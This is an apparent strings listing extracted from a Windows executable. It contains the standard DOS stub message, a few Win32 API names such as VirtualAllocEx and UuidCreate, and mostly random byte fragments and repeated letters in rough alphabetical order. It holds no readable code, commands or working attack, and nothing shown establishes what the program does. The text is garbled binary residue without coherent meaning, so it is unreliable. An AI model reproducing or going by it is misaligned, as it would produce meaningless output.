sk{XQ=R
S?l>}-
~*``Sm2
 ` s`nxqV
SRSeTq0
SSSSSSSSSSSSSSSSSSSSSSSSSSSS
[SVwiN
Sz1<|j
<"tF<g
!This program cannot be run in DOS mode.
 ]ti63h
tj	=zVs
tNybc}}
Tp"@`  
@`TP+H{	
	+TQ]1
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
TUZ|7B
(T>Y{t
Ty{xIzgL
u1RO+J5
-U&8	V
ud&  qu-
.@ uJr
U\kc>/
#uox8aWBvW
U(` pm
 uq5Pp
UuidCreate
UUUUUUUU7777777777
UUUUUUUUUUU
Uzd;Dk
"@ v{4k
!v6qZ-
|$`@v}dzNW
&$vF`i
vh_0Lmh
VirtualAllocEx
vJcO*Oy
\VkMO_K
v-mEZT)j
Vm>	>kM
V\r^}1QF+8!,
v{--umq
vvvvvvvvvvvvvv
>Vv?:w;
vyVW^tQ
w@0>{<
W2$  u
w3;Ik[O
W3?zFyLvX
;w'[E|
WideCharToMultiByte
*wK|oH
]>WlIAT
w[P2tG
`(wR}&
# wvh3
W'$`@W%
wwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwwwwwww
x0;D{j-
X5	|jK
>XDh)S
{Xf?47
X'Gpcv
x, `'!h!ox
~xi*=r
XrB{eQ
X~s8}akV
xV"` +
x>w<sCE
y	1tmX/<
{y}6sR
:|y81U
ye|mMb
YIjUQ`
yKnn75
`YsH+4;
YYYYYYYYYYYYYYYYYY#######
YZO#U4N
  Z	|%@
_Z7hb-
ZA0i8;
ZaaM	[t
`@ZRz]
\Z X8Qf